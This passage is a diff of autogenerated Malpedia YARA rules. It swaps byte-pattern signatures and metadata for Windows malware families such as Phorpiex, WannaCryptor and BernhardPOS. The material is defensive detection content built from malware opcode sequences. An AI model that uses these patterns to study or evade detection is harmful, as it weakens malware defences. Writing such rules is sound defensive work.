8b4c2440 6aff e8???????? 59 8b4c2448 33c0 89442424 } + $sequence_5 = { 53 6a68 5a e8???????? 83c40c b208 8bce } + $sequence_6 = { 8b4630 8b14b8 85d2 7405 e8???????? b980000000 e8???????? } + $sequence_7 = { c3 51 56 57 8bf1 33c0 8b7e1c } + $sequence_8 = { 8b4614 89442418 85c0 750c 385c2431 7506 885c2430 } + $sequence_9 = { 8d8d04f8ffff e9???????? 8d8d1cf8ffff e9???????? 8d8de0feffff e9???????? 8d8d34f8ffff } condition: - 7 of them and filesize <1318912 + 7 of them and filesize <1056768 } -rule MALPEDIA_Win_R77_Auto : FILE +rule MALPEDIA_Win_Unidentified_109_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "79566c97-5b66-5f14-a1d3-bc9852e6d698" + id = "c4f891e4-f77b-5dbc-bacf-3b1d550b883c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.r77" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.r77_auto.yar#L1-L154" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_109" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_109_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "76c887c6ccc22f9627519af58959f5ccdb37c325ffba24612ced9e4b32cde701" + logic_hash = "553f5c1aaae307ba70f86b75a4cbec28cc4c8b523dbd68b695bc6b2028248608" score = 75 quality = 75 tags = "FILE" @@ -144099,38 +147015,34 @@ rule MALPEDIA_Win_R77_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 740c 8b4f0c e8???????? 85c0 } - $sequence_1 = { 740b 8b0f e8???????? 85c0 } - $sequence_2 = { 33c9 4c8d05e3d40000 488d15e4d40000 e8???????? 4885c0 740f } - $sequence_3 = { 0f8517030000 488d0d58ad0100 ff15???????? 4885c0 7412 } - $sequence_4 = { 4c8d058bfb0000 488b45e0 48c1e820 85c0 755d 8b45e0 } - $sequence_5 = { 33d2 660f1344243c 33c9 e8???????? 59 } - $sequence_6 = { f7d8 1bc0 40 85c0 750b 46 3b37 } - $sequence_7 = { c1fa06 6bc838 8b0495f8a00110 f644082801 7422 8d4508 8975f8 } - $sequence_8 = { 745c ffc1 413bc8 72f1 4885ff } - $sequence_9 = { 660f58e0 660fc5c400 25f0070000 660f28a050680110 660f28b840640110 660f54f0 660f5cc6 } - $sequence_10 = { 7408 8b442430 8bc8 cd29 488d0df6980100 } - $sequence_11 = { 03f3 03c3 894508 833e00 7447 8b7df0 8b08 } - $sequence_12 = { 488b03 833800 7513 488d15e3a70000 488d0dbca70000 } - $sequence_13 = { 33c0 c3 56 e8???????? ff15???????? } + $sequence_0 = { 488d55df 488d4df7 4c8d45f7 e8???????? 8bf0 85c0 } + $sequence_1 = { 7405 85db 0f44d8 0fb68fa2030000 0fbe45ab 3bc1 7e11 } + $sequence_2 = { e8???????? 488bcb e8???????? 488bdf 4885ff 75b5 488b742430 } + $sequence_3 = { 8b07 418b09 4883c704 4d8d4904 480fafcd 4803c8 418bc0 } + $sequence_4 = { 2b8300010000 3bc5 7312 8bd5 488bcb e8???????? 85c0 } + $sequence_5 = { 4c8b3a 4c8be1 4c8bea 488d4c2420 41b8a8040000 33d2 } + $sequence_6 = { 23c6 440bf0 8d040a 418bd3 4403f0 418bc3 c1c80b } + $sequence_7 = { eb77 418d41ff 4863c8 488d048f 33ff 4d8d048a } + $sequence_8 = { 0f8462020000 83b90001000000 7621 e8???????? 89834c020000 85c0 0f8550020000 } + $sequence_9 = { 4289449efc 4c3bdd 7c8b 8b442450 8b0b 4c8b742420 8903 } condition: - 7 of them and filesize <350208 + 7 of them and filesize <723968 } -rule MALPEDIA_Win_Phorpiex_Auto : FILE +rule MALPEDIA_Win_Zerocleare_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "eb226bf1-84a3-5e5c-8655-1f02f1d972a0" + id = "3657cdfc-db20-5908-b80b-f3809b1ef7a0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.phorpiex_auto.yar#L1-L284" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zerocleare_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "626e70970105507345b3f584dcd1a33bae9d4d1c587f31ce85f081908c2a5392" + logic_hash = "684e088a58b2073463dab14cb1ba7b141fc0ac01570965634aebae02ef8b6f64" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -144142,52 +147054,32 @@ rule MALPEDIA_Win_Phorpiex_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 ff15???????? ff15???????? 50 e8???????? } - $sequence_1 = { ff15???????? 85c0 740f 6a07 } - $sequence_2 = { ff15???????? 85c0 741f 6880000000 } - $sequence_3 = { 6a20 6a00 6a00 6a00 8b5508 52 6a00 } - $sequence_4 = { e8???????? 83c410 6a00 6a02 6a02 6a00 6a00 } - $sequence_5 = { 6a01 6a00 68???????? e8???????? 83c40c 33c0 } - $sequence_6 = { e8???????? 99 b90d000000 f7f9 } - $sequence_7 = { 52 ff15???????? 6a00 6a00 6a00 6a00 68???????? } - $sequence_8 = { 50 e8???????? 83c404 e8???????? e8???????? ff15???????? } - $sequence_9 = { 68???????? ff15???????? 8d85f8fdffff 50 68???????? } - $sequence_10 = { 6a00 ff15???????? 85c0 7418 ff15???????? } - $sequence_11 = { 6a01 ff15???????? ff15???????? b001 } - $sequence_12 = { 6a00 682a800000 6a00 ff15???????? } - $sequence_13 = { 52 683f000f00 6a00 68???????? 6802000080 ff15???????? 85c0 } - $sequence_14 = { 68???????? ff15???????? e9???????? 8d45fc } - $sequence_15 = { 50 ff15???????? 8945fc 837dfc00 7416 8b4df8 } - $sequence_16 = { f7f9 81c210270000 52 e8???????? } - $sequence_17 = { e8???????? 99 b930750000 f7f9 81c210270000 } - $sequence_18 = { 50 e8???????? 59 59 85c0 7573 } - $sequence_19 = { 3d00010000 7504 83c8ff c3 8b542404 } - $sequence_20 = { 7508 6a00 ff15???????? 6804010000 } - $sequence_21 = { 6a21 50 e8???????? c60000 } - $sequence_22 = { e8???????? 83c41c 6880000000 8d4c240c 51 ff15???????? 6a00 } - $sequence_23 = { 52 e8???????? 99 b960ea0000 f7f9 } - $sequence_24 = { 6880000000 8d8424b4000000 50 6a0c 8d4c2420 51 6800142d00 } - $sequence_25 = { 83790c00 7419 83791800 7418 83c130 83c004 81f9???????? } - $sequence_26 = { 72f7 53 33c0 56 57 663bc2 } - $sequence_27 = { 56 57 68e8030000 ff15???????? e8???????? be???????? } - $sequence_28 = { 50 8d45ec 50 6805000020 } - $sequence_29 = { 8d45f8 50 8d45e4 50 6805000020 } + $sequence_0 = { db2d???????? b801000000 833d????????00 0f854f6efeff ba05000000 8d0df0694400 e8???????? } + $sequence_1 = { 0f1185d8f7ffff f30f7e4010 660fd685e8f7ffff c7401000000000 c7401407000000 668908 c645fc04 } + $sequence_2 = { 6a00 8d45e8 50 6a18 } + $sequence_3 = { ffd6 6af4 898578f7ffff ffd6 } + $sequence_4 = { 0f114598 0f1145a8 ff15???????? 8bf8 } + $sequence_5 = { 895614 7410 c74620df494300 c74624f24a4300 eb0e c7462087414300 } + $sequence_6 = { c745e4ad184200 eb08 8d4dd8 e8???????? 837e1808 74f2 8bce } + $sequence_7 = { 660f58ca 660f2815???????? f20f59db 660f282d???????? 660f59f5 660f28aa70534400 660f54e5 } + $sequence_8 = { 8b04cdd40a4400 5f 5e 5b 8be5 5d c3 } + $sequence_9 = { 33c0 8985e4f7ffff 90 8b4c3814 8d1438 8d4101 } condition: - 7 of them and filesize <2490368 + 7 of them and filesize <42670080 } -rule MALPEDIA_Win_Cryptic_Convo_Auto : FILE +rule MALPEDIA_Win_Puzzlemaker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c0d84b8c-dd86-5e0b-b294-081ee84952b7" + id = "e93d66ca-a521-530d-a49f-9104b54671e2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptic_convo" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptic_convo_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.puzzlemaker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.puzzlemaker_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "39890a4d7eaef0b28d86a0d6d65ec4ed011fdfc3e00013a201ada7ffacfd1cd9" + logic_hash = "f4b400ba752d2bb5a757bcaa926474306cca33660eefc885e89a26d2aeb5ebe7" score = 75 quality = 75 tags = "FILE" @@ -144201,32 +147093,32 @@ rule MALPEDIA_Win_Cryptic_Convo_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bf8 ffd6 85ff 7515 8d45e8 68???????? } - $sequence_1 = { 75f9 8dbddcfaffff 2bc2 4f 8a4f01 } - $sequence_2 = { 399e88000000 7445 399e8c000000 743d 6a40 6800300000 ff7510 } - $sequence_3 = { c20400 0fb7442404 ff742408 50 e8???????? c20800 } - $sequence_4 = { 50 6a01 6a00 68???????? 57 ffd3 85c0 } - $sequence_5 = { a4 33c0 8a88d0474000 884c05e8 40 84c9 } - $sequence_6 = { f3a4 8dbddcfaffff 4f 8a4701 47 84c0 75f8 } - $sequence_7 = { 85c0 7407 c605????????01 be???????? 8d7d98 a5 66a5 } - $sequence_8 = { 894584 ffd6 53 57 89458c ff15???????? } - $sequence_9 = { 8d45c8 66a5 50 53 } + $sequence_0 = { 48890b 488d5308 488d4808 0f1102 e8???????? 488d053c0e0100 488903 } + $sequence_1 = { f20f5cca f2410f590cc1 660f28d1 660f28c1 4c8d0dbb980000 f20f101d???????? } + $sequence_2 = { 0fb705???????? 66d1e8 6683e07f f30f6f05???????? } + $sequence_3 = { e8???????? 488bd8 488945a7 4885c0 7432 } + $sequence_4 = { 48895db7 4885db 0f84ca000000 4c896c2428 4c896c2420 4c8d4d07 4533c0 } + $sequence_5 = { 4489542444 81fae9fd0000 0f857e010000 4c8d3deddafeff } + $sequence_6 = { 488910 48895008 c3 4883ec28 4885c9 7411 488d0590e30100 } + $sequence_7 = { c705????????090400c0 c705????????01000000 c705????????01000000 b808000000 486bc000 488d0da6f80100 8b542430 } + $sequence_8 = { 48898520050000 488b05???????? 488d154a1b0200 488b0d???????? 4533ed 488985f8010000 } + $sequence_9 = { 488d0db4270100 e8???????? 85c0 740e ba01000000 488bcd ff15???????? } condition: - 7 of them and filesize <97280 + 7 of them and filesize <331776 } -rule MALPEDIA_Win_Cuegoe_Auto : FILE +rule MALPEDIA_Win_Yarat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "eccb0436-f9ed-5e03-8d27-4464cf8de9a1" + id = "9b4289ae-23e7-5628-ab26-1ca831bf886f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cuegoe_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yarat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yarat_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "9bdbb34dedb6d213b915fa268b74e0986ed09811af8e7637c05b65b2310f3a18" + logic_hash = "6ef74e5effac24b08695314060e4e7e4519b854f50f85d73d7052d0ace49145b" score = 75 quality = 75 tags = "FILE" @@ -144240,32 +147132,32 @@ rule MALPEDIA_Win_Cuegoe_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 397d68 7409 ff7568 e8???????? 59 6a57 5e } - $sequence_1 = { 50 895de4 e8???????? 837d2808 8b4514 } - $sequence_2 = { 0f8390feffff 8b0488 0fb6c8 894538 c16d3808 894d3c } - $sequence_3 = { 6a00 50 e8???????? 83c40c 33c0 89442410 e9???????? } - $sequence_4 = { 6a0a 8d45e8 8975e4 e8???????? 8d5dd0 e8???????? } - $sequence_5 = { 50 e8???????? 8d4570 50 ff750c 8d85d0030000 56 } - $sequence_6 = { 69c0a0860100 8a563c c7460c01000000 885608 89442410 3bd8 0f8387050000 } - $sequence_7 = { 8b0488 0fb6c8 894538 c16d3808 894d3c 899d40040000 8b15???????? } - $sequence_8 = { 8d858c000000 50 8d8574ffffff 6a4c 50 e8???????? 59 } - $sequence_9 = { 0f94c1 888c286c0d0000 03c7 89442410 837c241010 0f8c7affffff } + $sequence_0 = { e8???????? 8b75a8 8bf8 3bf7 7465 8b4e14 83f910 } + $sequence_1 = { c70000000200 e9???????? 56 68???????? 57 e8???????? 83c40c } + $sequence_2 = { 8d8544feffff 6a00 57 89864c010000 e8???????? 83c414 80bf0b05000000 } + $sequence_3 = { e8???????? 83c40c 85d2 0f8f28010000 7c08 85c0 0f831e010000 } + $sequence_4 = { 8b8f90050000 83c40c 85c9 7506 8b8f04030000 8b8748050000 8b4040 } + $sequence_5 = { 8a18 885dfe 80fb2e 8b5d08 7406 807dfe2c 7534 } + $sequence_6 = { 07 20c2 aa 709a 93 a3???????? 9e } + $sequence_7 = { 8b75fc 8bc7 c1e808 83e00f 8a80d0070a10 880433 8bda } + $sequence_8 = { e8???????? 83c408 85c0 7405 8d7728 eb38 8d85fcefffff } + $sequence_9 = { 8b4508 33f6 83f8ff 742d 8d8df4fdffff 51 50 } condition: - 7 of them and filesize <540672 + 7 of them and filesize <8692736 } -rule MALPEDIA_Win_Session_Manager_Auto : FILE +rule MALPEDIA_Win_Rad_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "dc2cef80-2dcf-5809-93bd-82c69da769f0" + id = "7146ba59-d944-5b98-95a4-2cbd8d5bc1ff" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.session_manager" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.session_manager_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rad" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rad_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "603fcab78a4336ae9ff58b2ce6e64cc670272e944fe82c789ba11945e145dd5d" + logic_hash = "ca5f1a440d85092616999ffada86b8990e8f68350339b252577329abb6a444ee" score = 75 quality = 75 tags = "FILE" @@ -144279,32 +147171,32 @@ rule MALPEDIA_Win_Session_Manager_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4c89b848240000 4c89b850240000 4c89b858240000 4c89b860240000 4c89b868240000 4c89b870240000 } - $sequence_1 = { 4c8d35fb2d0100 83e63f 488beb 48c1fd06 48c1e606 498b04ee } - $sequence_2 = { 4c89b838060000 4c89b840060000 4c89b848060000 4c89b850060000 4c89b858060000 4c89b860060000 4c89b868060000 } - $sequence_3 = { 4c89b8100b0000 4c89b8180b0000 4c89b8200b0000 4c89b8280b0000 4c89b8300b0000 4c89b8380b0000 } - $sequence_4 = { 4c89b8c8180000 4c89b8d0180000 4c89b8d8180000 4c89b8e0180000 4c89b8e8180000 4c89b8f0180000 } - $sequence_5 = { 4c89b890030000 4c89b898030000 4c89b8a0030000 4c89b8a8030000 4c89b8b0030000 4c89b8b8030000 4c89b8c0030000 } - $sequence_6 = { 4c89b820220000 4c89b828220000 4c89b830220000 4c89b838220000 4c89b840220000 4c89b848220000 4c89b850220000 } - $sequence_7 = { ff15???????? 488d0df81b0200 ff15???????? 488d0d7b170200 ff15???????? } - $sequence_8 = { 488d0dd7070000 e8???????? e8???????? 488d0d42070000 e8???????? } - $sequence_9 = { 4533c9 458d4101 488d542450 488bcb ff90a8000000 } + $sequence_0 = { c644242000 e8???????? 8d542420 52 8d8c2498000000 c684240c06000018 ff15???????? } + $sequence_1 = { 8b8680000000 3bc3 741b 8bbe84000000 e8???????? 8b8680000000 } + $sequence_2 = { a1???????? 33c4 89442434 8b4508 8b00 85c0 751a } + $sequence_3 = { 8b84241c010000 50 ffd6 83c404 8b8c2400060000 64890d00000000 } + $sequence_4 = { 8d8d70ffffff ff25???????? 8b8578ffffff 83e002 0f8413000000 83a578fffffffd } + $sequence_5 = { ffd3 8d8c2494000000 c684240806000005 ff15???????? 8b4c2418 51 8d8c2498000000 } + $sequence_6 = { ff15???????? 8d8c2494000000 c684240806000020 ff15???????? b8???????? 8d4c2420 } + $sequence_7 = { e8???????? 8bc7 50 c645fc02 e8???????? 8bc8 } + $sequence_8 = { 720a 8b4c2434 51 ffd6 83c404 8d9424a8000000 52 } + $sequence_9 = { 8d7e04 c645fc29 8d4f04 c706???????? 89bd10fdffff ff15???????? } condition: - 7 of them and filesize <372736 + 7 of them and filesize <207872 } -rule MALPEDIA_Win_Calmthorn_Auto : FILE +rule MALPEDIA_Win_Wannacryptor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8cbb3f25-515c-5fed-8b4e-4a931d9bfb1a" + id = "e56d2000-fe42-59bd-8926-478b3a54b7b3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.calmthorn_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wannacryptor_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "98170ddc8dfcd366956427aafd69264166f05ad426e5dc909d0630e51620ea92" + logic_hash = "c696b2074a3cd60e9575143d9577c550babed6e9c2f46c424c5b90d1a1647723" score = 75 quality = 75 tags = "FILE" @@ -144318,32 +147210,32 @@ rule MALPEDIA_Win_Calmthorn_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c78548adffff00000000 eb0f 8b8548adffff 83c001 898548adffff 8b8d68f9ffff 51 } - $sequence_1 = { e8???????? 83c404 3985dcf3ffff 7d20 8b954cfaffff 83c201 89954cfaffff } - $sequence_2 = { 0f57c0 660f13857498ffff eb1e 8b957498ffff 83c201 8b857898ffff 83d000 } - $sequence_3 = { eb1e 8b85bc86ffff 83c001 8b8dc086ffff 83d100 8985bc86ffff 898dc086ffff } - $sequence_4 = { 8b959875ffff 83d200 898d9475ffff 89959875ffff 83bd9875ffff00 7722 720c } - $sequence_5 = { ebb7 0fb6952cfdffff 83fa01 7552 c7855cbdffff00000000 eb0f 8b855cbdffff } - $sequence_6 = { ebba 0fb68d5efdffff 83f901 7556 0f57c0 660f1385c472ffff eb1e } - $sequence_7 = { 8a95b7fdffff 80c201 8895b7fdffff ebbd 0fb6859efdffff 83f801 7552 } - $sequence_8 = { 8b8518f8ffff 0fbe08 85c9 7502 eb02 ebba 0fb69591fdffff } - $sequence_9 = { eb0f 8b8d34f0ffff 83c101 898d34f0ffff 8b9564f6ffff 52 e8???????? } + $sequence_0 = { 56 8bf1 57 8b7c241c 8b4670 } + $sequence_1 = { 8854243c 8b44243c 50 51 8bce } + $sequence_2 = { b801000000 33ff 85c0 7e76 8bd8 8b5500 03cf } + $sequence_3 = { 8bce e8???????? 8a4649 84c0 7419 8b4620 } + $sequence_4 = { ff15???????? 50 e8???????? 85c0 742e 8b4004 8d542404 } + $sequence_5 = { 8b4674 c6464801 85c0 7509 6a00 } + $sequence_6 = { 50 ff15???????? 50 e8???????? 8b4820 6a00 6a00 } + $sequence_7 = { 8b4678 8d7e44 85c0 755f 8b17 } + $sequence_8 = { e8???????? 8d4648 8d4c2410 50 c744243000000000 } + $sequence_9 = { 57 8b7c241c 8b4670 85c0 7503 } condition: - 7 of them and filesize <2322432 + 7 of them and filesize <540672 } -rule MALPEDIA_Win_Crylocker_Auto : FILE +rule MALPEDIA_Win_Misha_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4bfc7917-6752-5365-845d-244ec08bbbad" + id = "3791b368-7721-59e9-a6c9-80386ca3e3f7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crylocker_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.misha" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.misha_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "846ce0f815360303954c01156a8157bafbdde3bd263a1bdd7a06f8c9923993ce" + logic_hash = "20e70ebbe7343afb7f42cf249a2a9fa16b58c61214c6be715dfea2d371ecbbbb" score = 75 quality = 75 tags = "FILE" @@ -144357,32 +147249,32 @@ rule MALPEDIA_Win_Crylocker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 51 8d542458 52 e8???????? 8d44245c } - $sequence_1 = { 50 e8???????? 8d4c2404 6a01 51 e8???????? } - $sequence_2 = { 6a03 50 e8???????? 8b5c2448 8b0b 51 8d54243c } - $sequence_3 = { 68???????? 53 e8???????? 83c408 53 85c0 7440 } - $sequence_4 = { 85c0 750b 5b b8f9ffffff 5d 83c410 c3 } - $sequence_5 = { 8d442430 50 e8???????? 8d4c2434 68???????? 51 e8???????? } - $sequence_6 = { 50 50 8b44244c 50 6a00 6a00 56 } - $sequence_7 = { 0f8430020000 8d4c2404 51 e8???????? 8d542408 } - $sequence_8 = { e8???????? 8b1d???????? 83c428 50 ffd3 8b542430 } - $sequence_9 = { e8???????? 8d4c2408 6aff 51 e8???????? 8d542410 6a02 } + $sequence_0 = { 0fbe09 03c1 894510 8b45f8 40 8945f8 8b4510 } + $sequence_1 = { c20400 55 8bec 51 837d0802 7448 837d0804 } + $sequence_2 = { 8945dc 817d140000007e 7607 33c0 e9???????? 8b4524 } + $sequence_3 = { 32c0 5d c3 56 8bf0 eb0a 8bce } + $sequence_4 = { c78510ffffff04040404 c78514ffffff04040404 c78518ffffff04040404 c7851cffffff04040404 c78520ffffff05050505 c78524ffffff05050505 c78528ffffff05050505 } + $sequence_5 = { 85c0 7404 2bf3 8930 b001 } + $sequence_6 = { 8b450c 0590010000 50 e8???????? 83c414 b001 e9???????? } + $sequence_7 = { 8b4dcc 8d440104 8945cc 837d900f 0f829e000000 837d1c00 741d } + $sequence_8 = { 50 e8???????? 8b5508 56 6a1c 59 } + $sequence_9 = { 8b4514 e8???????? 0fb64524 85c0 7456 6a00 68ffffff7f } condition: - 7 of them and filesize <139264 + 7 of them and filesize <710656 } -rule MALPEDIA_Win_M0Yv_Auto : FILE +rule MALPEDIA_Win_Bernhardpos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "13583ad1-2b04-58e4-9f81-2e107221c7c3" + id = "7b2918eb-6e4b-588b-9817-19ede384242f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.m0yv" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.m0yv_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bernhardpos_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "885921d8c153e05a9fb6cddfe964abb6a41c6e3fc24a745c88fdae391a38b5ef" + logic_hash = "b0e71b787dda9e2d7e79e7ddddae77406aa6aa8d138e23e43da621be02324cd1" score = 75 quality = 75 tags = "FILE" @@ -144396,34 +147288,34 @@ rule MALPEDIA_Win_M0Yv_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 490faff8 4d89c3 4901ff 4c8b1424 490fafd2 48039424b8000000 4c89ef } - $sequence_1 = { 72e7 4889f9 4889da e8???????? 48c7474800000000 31c0 6690 } - $sequence_2 = { f6c201 0f84e3000000 4183fb66 775c 744e } - $sequence_3 = { 4889fa e8???????? 4889f9 4889fa e8???????? 4c89f1 } - $sequence_4 = { 29e8 488bac24a8000000 894500 895504 44895d08 } - $sequence_5 = { 490fafc6 4801c2 4889942440010000 4c89842488000000 4c89c0 480fafc1 } - $sequence_6 = { 4f037ce538 4c21df 4c31d7 4e03bce498000000 4831c1 4901ff 4c89c8 } - $sequence_7 = { 2b6a24 448901 44894904 44895108 4489590c 44897110 897114 } - $sequence_8 = { 4883ec28 e8???????? 4885c0 7409 488b4010 } - $sequence_9 = { c1e802 4122c2 41884041 8bc2 83e003 8a0481 498bc8 } + $sequence_0 = { 0f840a010000 8d85ecfbffff 50 682a020000 68???????? 8b8df0fbffff } + $sequence_1 = { ff15???????? 8b8d54feffff 668901 6a10 8d855cfeffff 50 } + $sequence_2 = { 0fbe5415f8 33ca 8b4508 0345f4 8808 ebc7 5f } + $sequence_3 = { 8945fc 8b45fc 8b4d08 03483c 894df4 } + $sequence_4 = { 8808 ebc7 5f 5e 5b } + $sequence_5 = { 668b0d???????? 66894dfc 8a15???????? 8855fe 8d45f8 50 ff15???????? } + $sequence_6 = { 83e863 5f 5e 5b } + $sequence_7 = { 51 ff15???????? 8d85ecfeffff 50 e8???????? 83c404 85c0 } + $sequence_8 = { eb2c 33c0 eb2d 33c0 eb29 } + $sequence_9 = { e8???????? 83c404 6a01 8d85d0feffff 50 ff15???????? } condition: - 7 of them and filesize <779264 + 7 of them and filesize <368640 } -rule MALPEDIA_Win_Plead_Auto : FILE +rule MALPEDIA_Win_Mocton_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fd5a06dc-6983-5a74-97bc-98455f57d710" + id = "72b425f0-e1bd-580c-ba97-36f1bcb1157c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.plead_auto.yar#L1-L235" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mocton_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "6a7ab17d07de8a4ca9e1e2599ef78a9a501e90d23119efee05ad014354df9153" + logic_hash = "f466c26ab0d8cd5071e2b5a32b6cc128a028215985bbf34b30810ffd494c9c82" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -144435,48 +147327,34 @@ rule MALPEDIA_Win_Plead_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 85c0 750c c745fcfcffffff e9???????? 395d18 } - $sequence_1 = { ebda 33f6 c745fcf8ffffff 3bf7 } - $sequence_2 = { bf00800000 57 53 56 897d14 } - $sequence_3 = { e8???????? 817d14e8030000 53 56 } - $sequence_4 = { 59 5e c20400 8b4c2404 56 } - $sequence_5 = { 50 ff15???????? 6a3f 33c0 59 } - $sequence_6 = { 8d4dfc 51 8d4dd8 51 } - $sequence_7 = { 8d4514 53 50 56 53 6a05 } - $sequence_8 = { ff15???????? 50 ff15???????? 33c0 81c418020000 } - $sequence_9 = { 5e 5b 33c0 81c418020000 c21000 8b84241c020000 } - $sequence_10 = { 7cf1 ffd3 8b35???????? 2bc7 3de8030000 } - $sequence_11 = { 8b5508 52 ff15???????? 6aff a1???????? 50 ff15???????? } - $sequence_12 = { 50 8b1d???????? ffd3 85c0 743b } - $sequence_13 = { 8b8c241c020000 68???????? 51 ff15???????? } - $sequence_14 = { 5d 8a44341c 32c2 8844341c 46 3bf1 } - $sequence_15 = { c705????????01000000 ff15???????? 8b1d???????? ffd3 8bf8 33f6 8bcf } - $sequence_16 = { 648b1530000000 8b520c 8b521c 8b5a08 } - $sequence_17 = { 8b430c 034510 6a04 6800100000 51 50 } - $sequence_18 = { 8d7a08 e8???????? 52 e8???????? e9???????? 0fb755e0 83fa08 } - $sequence_19 = { e8???????? b02c aa 8b4510 85c0 } - $sequence_20 = { 33c0 f3aa eb10 e8???????? 8b4314 034508 } - $sequence_21 = { 8b5324 f7c200000002 7412 6800400000 8b4310 50 } - $sequence_22 = { e8???????? 0fb64de2 8b55ec 8b7df0 8b07 } - $sequence_23 = { b940000000 50 e2fd 56 394510 747e } + $sequence_0 = { 